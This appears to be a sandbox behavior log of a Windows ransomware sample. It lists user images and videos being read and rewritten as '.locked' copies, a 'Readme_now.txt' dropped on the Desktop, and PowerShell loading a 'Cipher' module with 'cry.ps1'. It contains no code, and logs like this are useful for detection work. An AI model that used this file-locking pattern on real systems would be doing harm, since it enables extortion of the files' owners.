| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\f_0dPqd34U\IcmXYh5JRxcO.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\f_0dPqd34U\IcmXYh5JRxcO.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\f_0dPqd34U\IcmXYh5JRxcO.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\f_0dPqd34U\TW8F PgmZP1TQs q.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q\Ax8vf.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q\Ax8vf.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q\Ax8vf.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q\d15AoyiBl3uE7hiQy9m8.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q\d15AoyiBl3uE7hiQy9m8.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\y45Q\d15AoyiBl3uE7hiQy9m8.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\hsbtHIVR6ALxLmYiy.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\hsbtHIVR6ALxLmYiy.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\hsbtHIVR6ALxLmYiy.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\T20oxXsoi.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\T20oxXsoi.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\T20oxXsoi.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\SzJrWGq9Ll\_TaGTWaeVd.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\SzJrWGq9Ll\_TaGTWaeVd.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\SzJrWGq9Ll\_TaGTWaeVd.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\i9n7calXH4A7M.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\i9n7calXH4A7M.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\i9n7calXH4A7M.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\leqYeFFf0Mh2LzG35.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\leqYeFFf0Mh2LzG35.bmp.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\leqYeFFf0Mh2LzG35.bmp.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\dDC9HY0gnLu5.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\dDC9HY0gnLu5.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\dDC9HY0gnLu5.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\IwsRH9V3WgO.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\IwsRH9V3WgO.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\IwsRH9V3WgO.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\KtMITYU44m.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\KtMITYU44m.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\KtMITYU44m.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\pIzY1mQPy5z.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\pIzY1mQPy5z.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\pIzY1mQPy5z.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\u ZdFh3wm.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\u ZdFh3wm.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\u ZdFh3wm.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\W-iMLOAa5PVVLaHlMUa.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\W-iMLOAa5PVVLaHlMUa.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\W-iMLOAa5PVVLaHlMUa.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\YmuQA0xKFmS1PQAo\wzoS7bt0.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\YmuQA0xKFmS1PQAo\wzoS7bt0.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\YmuQA0xKFmS1PQAo\wzoS7bt0.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\kU8W1Obiy0WAauUs13Q.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\kU8W1Obiy0WAauUs13Q.avi.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\tQvzXdA-wIPGe25N-.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\tQvzXdA-wIPGe25N-.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\tQvzXdA-wIPGe25N-.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\MlcP9Z6qmpKKHL\0Blj4c_PVMox6Krbe.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\MlcP9Z6qmpKKHL\0Blj4c_PVMox6Krbe.avi.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\MlcP9Z6qmpKKHL\0Blj4c_PVMox6Krbe.avi.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\2QQ3yhqnFri.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\2QQ3yhqnFri.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\2QQ3yhqnFri.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\l3wCgULrXQE9.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\l3wCgULrXQE9.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\l3wCgULrXQE9.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\PXy_oqq9tNpNFBr.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\PXy_oqq9tNpNFBr.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\PXy_oqq9tNpNFBr.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\HvvHqo0ADHwSN3BP13g.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\HvvHqo0ADHwSN3BP13g.avi.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\HvvHqo0ADHwSN3BP13g.avi.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\ReeG4dx.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\ReeG4dx.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\ReeG4dx.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\eRyEYq-B.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\eRyEYq-B.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\eRyEYq-B.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\Et3YlzqRrM1z-73.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\Et3YlzqRrM1z-73.avi.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\Et3YlzqRrM1z-73.avi.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\m_1Jy6jg.mp4 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\m_1Jy6jg.mp4.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\m_1Jy6jg.mp4.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\w2PClaQ4pHd.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\w2PClaQ4pHd.avi.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Videos\w2PClaQ4pHd.avi.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\Readme_now.txt | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Pipe | \device\namedpipe\pshost.131940402684429065.1308.defaultappdomain.powershell | open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_FIRST_PIPE_INSTANCE, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_READMODE_MESSAGE, PIPE_TYPE_MESSAGE, max_instances = 1 |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\typesv3.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\HelpV3.format.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
3 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 | type = file_attributes |
|
10 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps | type = file_attributes |
|
197 | |
| Get Info | C:\ | type = file_attributes |
|
192 | |
| Get Info | C:\Windows\system32\wldp.dll | type = file_attributes |
|
104 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\cjppbfq4.bds.ps1 | type = file_type |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\y2tg4mad.4xk.psm1 | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\typesv3.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\HelpV3.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
69 | |
| Get Info | C:\Users | type = file_attributes |
|
196 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 | type = file_type |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules | type = file_attributes |
|
8 | |
| Get Info | C:\Program Files (x86)\WindowsPowerShell\Modules | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ | type = file_attributes |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher | type = file_attributes |
|
9 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\Cipher.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\Cipher.psm1 | type = file_attributes |
|
11 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\Cipher.psm1 | type = file_type |
|
4 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\Cipher.psm1 | type = file_type |
|
2 | |
